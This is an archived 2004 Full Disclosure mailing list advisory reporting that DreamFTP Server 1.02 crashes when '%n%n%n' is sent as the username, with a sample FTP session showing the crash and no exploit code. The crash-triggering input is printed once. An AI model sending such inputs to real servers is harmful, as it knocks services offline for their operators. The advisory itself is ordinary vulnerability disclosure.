Full Disclosure mailing list archives
DreamFTP Server 1.02 Buffer Overflow
From: "badpack3t" <badpack3t () security-protocols com>
Date: Sat, 7 Feb 2004 00:29:54 -0500 (EST)
SP Research Labs Advisory x09 -------------------------------------------- DreamFTP 1.02 Buffer Overflow -------------------------------------------- Vendor Home Page: http://www.bolintech.com/ Date Released - 2.6.2004 --------------------------------------------------- Product Description from the vendor: Dream FTP Server provides powerful, multithreaded and robust FTP server performance with a user-friendly and easy-of-use interfaces. -------------------- Buffer Overflow When connecting to the ftp server and supplying %n%n%n for the username, the ftp server crashes. Example: --------- C:\>ftp 192.168.1.101 Connected to 192.168.1.101. 220- **************************************** 220- 220- Welcome to Dream FTP Server 220- Copyright 2002 - 2004 220- BolinTech Inc. 220- 220- **************************************** 220- 220 User (192.168.1.101:(none)): %n%n%n Connection closed by remote host. **Application Crashes** ---------- Exploit: Not worth the time to debug and code an exploit. -------------------------------------- Tested on WindowsXP SP1 Original Advisory: http://www.security-protocols.com/modules.php?name=News&file=article&sid=1722 peace out, ------------------------------ badpack3t www.security-protocols.com ------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- DreamFTP Server 1.02 Buffer Overflow badpack3t (Feb 06)
- Re: DreamFTP Server 1.02 Buffer Overflow Bill Weiss (Feb 06)
- Re: DreamFTP Server 1.02 Buffer Overflow Kevin Gerry (Feb 06)
- Re: DreamFTP Server 1.02 Buffer Overflow Berend-Jan Wever (Feb 11)
- Re: DreamFTP Server 1.02 Buffer Overflow Bill Weiss (Feb 06)